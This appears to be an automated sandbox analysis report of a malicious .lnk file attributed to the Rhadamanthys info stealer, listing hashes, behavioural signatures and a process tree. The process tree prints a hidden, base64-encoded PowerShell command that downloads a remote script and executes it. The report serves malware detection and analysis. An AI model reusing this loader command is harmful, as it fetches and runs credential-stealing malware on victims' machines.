Analysis
-
max time kernel
146s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
06-04-2024 01:11
Static task
static1
Behavioral task
behavioral1
Sample
DOC692 - 692692.lnk
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
DOC692 - 692692.lnk
Resource
win10v2004-20240226-en
General
-
Target
DOC692 - 692692.lnk
-
Size
9KB
-
MD5
a344b567076691b5cd838512c99bc884
-
SHA1
0de4ad8f9f127c0c444bb7db4459d0977b1f6506
-
SHA256
decbd662ecab295cb2c060232a6de8218843d671b7cb628aaf769ba4bcdf126f
-
SHA512
ad6d3fed7647c933c9a23938f7c39a8799d5845cd6a9e1fec6d0a2044c740795d428e89467c4e5b1f8217217f272863438b68e160da312d6ae8498af9688dd98
-
SSDEEP
192:8z5phm3MSBfQbxE4l2g9FWV4FBno2dzSkbP43O5yrf68g493f61hVNeXkI:u5fcMS5Qb6EouFB3dzBbw3Omf68Zp9XV
Malware Config
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2972 created 2520 2972 powershell.exe sihost.exe -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 8 2972 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exedialer.exepid process 2972 powershell.exe 2972 powershell.exe 2972 powershell.exe 2972 powershell.exe 1440 dialer.exe 1440 dialer.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2972 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 2824 wrote to memory of 2972 2824 cmd.exe powershell.exe PID 2824 wrote to memory of 2972 2824 cmd.exe powershell.exe PID 2972 wrote to memory of 1440 2972 powershell.exe dialer.exe PID 2972 wrote to memory of 1440 2972 powershell.exe dialer.exe PID 2972 wrote to memory of 1440 2972 powershell.exe dialer.exe PID 2972 wrote to memory of 1440 2972 powershell.exe dialer.exe
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2520
-
C:\Windows\system32\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1440
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\DOC692 - 692692.lnk"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2824 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -Ex Bypass -WindowStyle Hidden -Enc KABpAHcAcgAgAGgAdAB0AHAAcwA6AC8ALwBpAG0AYQBuAGkAawB1AHUALgBjAG8AbQAvAGQAbwBuAGUALgB0AHgAdAAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAKQAuAEMAbwBuAHQAZQBuAHQAIAB8ACAAaQBOAHYATwBrAEUALQBFAHgAUAByAGUAUwBzAGkATwBuAA==2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2972
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82